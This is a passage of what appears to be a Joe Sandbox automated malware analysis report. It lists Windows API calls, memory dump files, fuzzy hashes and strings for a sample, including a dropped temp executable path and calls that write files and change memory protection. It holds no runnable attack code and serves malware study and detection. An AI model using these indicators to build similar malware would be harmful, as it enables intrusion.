                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$AttributesDeleteMovelstrcmp
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe
                                                                                                                                                                                                                                                      • API String ID: 4216764668-2091069259
                                                                                                                                                                                                                                                      • Opcode ID: d650867cbabe2241ff8acabc40b0d1642bf08f5078d220d4dc31b2e488548c08
                                                                                                                                                                                                                                                      • Instruction ID: 12a36f7fc0547f54a4055c45ee460fb9c2b2bc2b111907e1b02de74545f4f34a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d650867cbabe2241ff8acabc40b0d1642bf08f5078d220d4dc31b2e488548c08
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B1E08631305230BBCB201F60BC0DACB3B5CAF42231F00C064F85491020C73448A69B9A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,?,?,?,?,?,00422419,?), ref: 004242F9
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00463BB8,00000001), ref: 00424377
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00463BB8,00000000), ref: 004243DC
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00463BB8,00000001), ref: 00424400
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(00463BB8,00000000), ref: 00424460
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExchangeInterlocked$QueryVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2947987494-0
                                                                                                                                                                                                                                                      • Opcode ID: b00c041dc3ec42eb618501efed6bccdf0cd35c8c0d5b720ffc4708d03e734375
                                                                                                                                                                                                                                                      • Instruction ID: 9aef48d3448f67a9f75b32ee8449049223c10bbefaa008034e9de75feff364b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b00c041dc3ec42eb618501efed6bccdf0cd35c8c0d5b720ffc4708d03e734375
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9651D330B00671DBCB24CF19E884B6A73A0EBC1755FA481ABE802C7291E778ED42C75D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetStartupInfoA.KERNEL32(76AF0A60), ref: 004259A9
                                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000800), ref: 00425A50
                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(-000000F6), ref: 00425AA9
                                                                                                                                                                                                                                                      • GetFileType.KERNEL32(00000000), ref: 00425AB7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileType$HandleInfoStartup
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2290155327-0
                                                                                                                                                                                                                                                      • Opcode ID: f8f63ec4bba8fd702233c63b22d656da169e2781094af63c60f0cb75cb52c619
                                                                                                                                                                                                                                                      • Instruction ID: d2a862219b93b2636bbf7e154969fd1a02f9e5da5015a8ccb00956fe4b263de6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8f63ec4bba8fd702233c63b22d656da169e2781094af63c60f0cb75cb52c619
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD512771704A618FD7208F28EC857667BA0AB05335F99836BD4A2CB2E0E778D841C71A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041104A
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00411064
                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000064,00000000,00000000), ref: 004110CB
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,?), ref: 004110DB
                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(?,?), ref: 004110EF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$Heap$AllocateProcesslstrcatlstrcpy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 639236505-0
                                                                                                                                                                                                                                                      • Opcode ID: 44d8f4fcfb5e84e8657ef31bca33bc3400902bfa8f18efaf28f601e84597aa2f
                                                                                                                                                                                                                                                      • Instruction ID: 00c259d247746a2f3f9f6cbc078631993a97f025e118c40de3abb8ee35525b35
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44d8f4fcfb5e84e8657ef31bca33bc3400902bfa8f18efaf28f601e84597aa2f
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB414C72C0021DBFDF219F94CD85DEFBBBDEB08314F5005AAF614A2190DA74AB948A64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0045A2D8,?,?,00000000,?,00401F4A,?,?), ref: 0041A852
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(0045A2D8,00000000,00000000,?,00401F4A,?,?), ref: 0041A86A
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,?,?), ref: 0041A898
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,00000400,?,00000000,?,?,?,?,?,?), ref: 0041A8FA
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0041A903
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Filelstrlen$CloseCreateHandleRead
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3969191716-0
                                                                                                                                                                                                                                                      • Opcode ID: f1bc365878a1fba07598aae656edbd1a92688bd0fca3672f0b62f6462dadd13d
                                                                                                                                                                                                                                                      • Instruction ID: 70d8934ea1e1ab713b593232fcf5332bb3268c6813b75f36181d3b14db31b1a8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1bc365878a1fba07598aae656edbd1a92688bd0fca3672f0b62f6462dadd13d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 542171B2900118BFDB20AB94DC41EEF777CEB04354F5001AAFB05E3150D6356EA69B7A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000027,0042A7D4,?,76AE83C0,00000000,00000000,?,?,00500000,?,00000027), ref: 0040EB66
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040EB8A
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040EBE7
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0040EBF2
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrlen$lstrcpy
                                                                                                                                                                                                                                                      • String ID: http://
                                                                                                                                                                                                                                                      • API String ID: 805584807-1121587658
                                                                                                                                                                                                                                                      • Opcode ID: a7c4ec4624abeedc241f4df41fb67cd8b73925c19931829be609556c32468d37
                                                                                                                                                                                                                                                      • Instruction ID: d1b77b990f14ce89a6e0dde8a29faca488bd1fe2f45f00a0f1608666c2b3606b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7c4ec4624abeedc241f4df41fb67cd8b73925c19931829be609556c32468d37
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C31D831504284DBDB21DF65D9846AB7FB49B0A308F5008B7DC82A7382D679E912D765
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00424F4C
                                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,0000001C), ref: 00424F5D
                                                                                                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C), ref: 00424FA3
                                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0000001C), ref: 00424FE1
                                                                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,0000001C), ref: 00425007
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Virtual$Query$AllocInfoProtectSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4136887677-0
                                                                                                                                                                                                                                                      • Opcode ID: 1c3d2e6415a430fcb73f80f94f34f694c2061d81321953f11082180c8996f1ee
                                                                                                                                                                                                                                                      • Instruction ID: ca7926daa7b0696f69bf06ee6559843a5a91446e15de802e0cc8552f3fe8254c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c3d2e6415a430fcb73f80f94f34f694c2061d81321953f11082180c8996f1ee
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF31D132F00229EBCF20CFA4ED44AEDBB78EB84724F550166E901E3290D7349E51DB99
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,?), ref: 00411176
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00411180
                                                                                                                                                                                                                                                      • lstrcmpA.KERNEL32(00000000,?), ref: 004111B9
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004111E7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: lstrcmplstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                      • String ID: \\%s\
                                                                                                                                                                                                                                                      • API String ID: 3485474333-3797145132
                                                                                                                                                                                                                                                      • Opcode ID: 32064e61e1f49b5c9c4fb0e02d964cd57f1740343d7312fdcfdc3ce7af2f1b60
                                                                                                                                                                                                                                                      • Instruction ID: 84d4c3ec829869dbe6ef3b310b516fc96ec6a1f7541f08e11886f651c211f9e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32064e61e1f49b5c9c4fb0e02d964cd57f1740343d7312fdcfdc3ce7af2f1b60
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA21C272A0425DBADF1097A4DC09FEE7BACBB09304F440036E704F7191E778959AC7A5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0045983C,?,?,00000000,?,00404A47,?,?,?,?,?,?,?,?), ref: 00412B8A
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0045983C,?,?,00000000,?,00404A47,?,?,?,?,?,?,?,?), ref: 00412BB0
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0045983C,?,?,00000000,?,00404A47,?,?,?,?,?,?,?,?), ref: 00412BD9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$Enter
                                                                                                                                                                                                                                                      • String ID: GJ@
                                                                                                                                                                                                                                                      • API String ID: 2978645861-4141786184
                                                                                                                                                                                                                                                      • Opcode ID: 9d42d7c0c86a34355b68c5a34fe93979f0555eb0cb166625dd536df2441cc038
                                                                                                                                                                                                                                                      • Instruction ID: 00e6de7869e808ec88370768f49c71200ac8386265d760a53ec3ec446128fc31
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9d42d7c0c86a34355b68c5a34fe93979f0555eb0cb166625dd536df2441cc038
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C111E676624304DF9715AF14DC465D6B798EF05321B10402BFC04C7202DAB8AC9187A9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000080), ref: 00407B25
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00407B36
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00407B4F
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00407B56
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(?,00000007), ref: 00407B7F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Attributes$CloseCreateHandleWrite
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 692393803-0
                                                                                                                                                                                                                                                      • Opcode ID: f3df47be0e8b8253625d1352de455ec88687a31633dca1895cd65be279117722
                                                                                                                                                                                                                                                      • Instruction ID: 40671c2e2f84df2f62c6f4eb0101908bd37021d9e9d593671b63d8caa07d46a2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3df47be0e8b8253625d1352de455ec88687a31633dca1895cd65be279117722
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13018E31905258BBEF215F649C49FDB3F68AF05364F004126FD00621D08274AE61DB66
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00457AB8), ref: 00409541
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000004,00000080,00000000), ref: 00409572
                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00409584
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00457AB8,?,?,00000000), ref: 00409594
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040959B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
